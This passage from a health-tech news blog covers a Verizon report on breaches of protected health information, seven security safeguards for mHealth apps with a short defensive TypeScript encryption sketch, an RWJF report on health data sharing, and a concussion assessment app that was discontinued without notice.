It’s not just your doctor’s office, hospital or payer. It will be no surprise to our Readers that the healthcare sector is #7 in breaches–but a PHI breach may also come from non-healthcare (in the US, still HIPAA-covered) sources. This Editor spoke with Suzanne Widup, the lead author of the PHI Report and an info security/forensics expert. Included in that 90 percent are workers’ compensation programs, self-insured companies, the public sector, financial/insurance companies and–as a damper on this highly competitive area where results are hard to gauge–wellness programs. Most organizations, according to Ms Widup, aren’t even conscious that they are holding this information and need to specially protect it from intrusion, as “PHI is like gold for today’s cybercriminal.”

Consistent with other authoritative tracking studies like Ponemon Institute’s and ID Experts’, the threat is from within: physical theft and loss, insider misuse and ‘miscellaneous’ account for 77 percent of incidents. And as Bryan Sartin, managing director of Verizon’s RISK team, noted in his keynote today, attacks take on average over seven months to even be noticed. The breaches are long term, and start small and sneaky. Two-thirds of organizations don’t find out on their own, only when the breach starts to affect other partners. (Surprise!) Despite the proven Chinese and Black Vine involvement in several high-profile, high-volume data hacks (Anthem), and ‘brute force’ hacks that make headlines (iCloud last year), the average breach is an inside job where “assets grow legs and walk off,” in Ms Widup’s words, or privilege misuse.

When I asked Ms Widup about the Internet of Things (which is moving high on the hype curve, from what your Editor has experienced to the nth degree at this conference), she confirmed that this is an area that needs extra cybersecurity protection. (more…)

Seven safeguards for your mHealth app

With cyberattacks from all sources on the rise, and mHealth apps being used by providers in care coordination, telehealth, patient engagement and PHRs, Practice Unite–which has some experience in this area, designing customized app platforms for healthcare organizations’ patient and clinician communications–notes in its blog seven points for developers to keep in mind:

1. Access control– unique IDs assigned to each user, remote wiping of the mHealth app from any user’s device.
2. Audit controls
3. Authentication
4. Integrity controls, such as compartmentalization, to ensure that electronically transmitted PHI is not improperly altered or corrupted
5. Transmission security: data encryption at rest, in transit, and on independently secured servers protects PHI at each stage of transmission
6. Third party app integration–must fully comply with HIPAA safeguards
7. Proprietary data encryption

But all seven points need backing from the top on down in a healthcare organization. (More in the article above)
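
As a concrete (and heavily simplified) illustration of point 5, here is a sketch of encrypting PHI at rest using Node’s built-in crypto module, in TypeScript. Key management, rotation, and the storage layer are deliberately out of scope; treat this as a sketch of the idea, not a HIPAA-compliant implementation.

```typescript
// Minimal sketch of encrypting a PHI record at rest with AES-256-GCM (Node crypto).
// Real apps need managed keys (KMS/HSM), rotation, and audited access on top of this.
import { createCipheriv, createDecipheriv, randomBytes } from "crypto";

interface EncryptedRecord {
  iv: string;   // unique per record
  tag: string;  // GCM auth tag, detects tampering (an integrity control)
  data: string; // ciphertext, hex-encoded
}

export function encryptPHI(plaintext: string, key: Buffer): EncryptedRecord {
  const iv = randomBytes(12);
  const cipher = createCipheriv("aes-256-gcm", key, iv);
  const data = Buffer.concat([cipher.update(plaintext, "utf8"), cipher.final()]);
  return { iv: iv.toString("hex"), tag: cipher.getAuthTag().toString("hex"), data: data.toString("hex") };
}

export function decryptPHI(record: EncryptedRecord, key: Buffer): string {
  const decipher = createDecipheriv("aes-256-gcm", key, Buffer.from(record.iv, "hex"));
  decipher.setAuthTag(Buffer.from(record.tag, "hex"));
  return Buffer.concat([decipher.update(Buffer.from(record.data, "hex")), decipher.final()]).toString("utf8");
}

// const key = randomBytes(32); // in practice, fetched from a KMS/HSM, never hard-coded
```

The same primitives cover data in transit only when paired with TLS; the list’s other points (unique IDs, audit logging, remote wipe) are organizational and platform controls that no single code snippet supplies.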

“Data moves at the speed of trust”–RWJF report

The report issued today by the influential Robert Wood Johnson Foundation (RWJF), ‘Data for Health: Learning What Works’, advocates a fresh approach to health data through greater education on the value/importance of sharing PHI, improved security and privacy safeguards, and investing in community data infrastructure. If the above quote and the first two items sound contradictory, perhaps they are, but current ‘strict’ privacy regulations (that’s you, HIPAA), data siloing and the current state of the art in security aren’t stemming Hackermania (or sheer bad data hygiene and security procedures). Based on three key themes, the RWJF is recommending a suite of actions (see below) to build what they term a ‘Culture of Health’. All of which, from the 10,000-foot view, seem achievable. The need–and importantly, the perception of need–to integrate the rising quantity of data from all these devices, pry it out of its silos (elaborated upon earlier this week in ‘Set that disease data free!’), analyze it and make it meaningful plus shareable to people and their doctors/clinicians keeps building. (‘Meaningful’ here is not to be confused with the HITECH Act’s Meaningful Use.)

But who will take the lead? Who will do the work? Will the HIT structure, infrastructure and very importantly, the legal framework follow? We wonder if there is enough demand and bandwidth in the current challenged system. Release. RWJF ‘Data for Health’ page with links to study PDF, executive summary which adds details to the recommendations below, more.

What happens when a medical app…vanishes?

You have just entered The App Twilight Zone…. Our readers know that concussion and diagnosis have been a focus of this Editor’s, and validating apps a focus of Editor Charles’, who brought this to my attention. The app’s name: The Sport Concussion Assessment Tool 2 (SCAT2). The news report states: “It contains all the essentials you would want in a concussion app: a graded symptoms checklist, cognitive testing, balance testing, Glasgow coma scale, Maddocks score, baseline score ability, serial evaluation, and password protected information-sharing via email.”  The plot: it was deactivated without warning or notice by the developer, Inovapp (link to sketchy CrunchBase profile), yet remains listed on the iTunes store.

What happened? A modified standard (SCAT3) was developed in 2012, which updated SCAT2 with non-critical additions: indications for emergency management, a slightly more extensive background section, a neck exam, and more detailed return-to-play instructions. SCAT3 is only available on (inconvenient) paper. No word from Inovapp on why it discontinued the app, nor on any plans for an update.

The SCAT2 had gained, in a short time, a following among coaches and sports medical professionals because it was the first app based upon the international standard (Zurich, 2008, 3rd International Conference on Concussion in Sport), transferring a paper assessment tool into an easy-to-use app. In fact, the NHL (National Hockey League) has its own version. Users have a right to be upset, but moreover, this points to a glaring shortcoming of medical apps–their developers vanishing into the night without a by-your-leave. And read the comments by (mainly) doctors on securing patient information after the app is used (HIPAA standards) and one physician’s criticism of apps such as this as a ‘crutch’.  A Pointer to the Future we don’t want to see. The authors Irfan Husain and Iltifat Husain, MD are to be congratulated. Popular app being used to manage concussions fails, failing patients (iMedicalApps)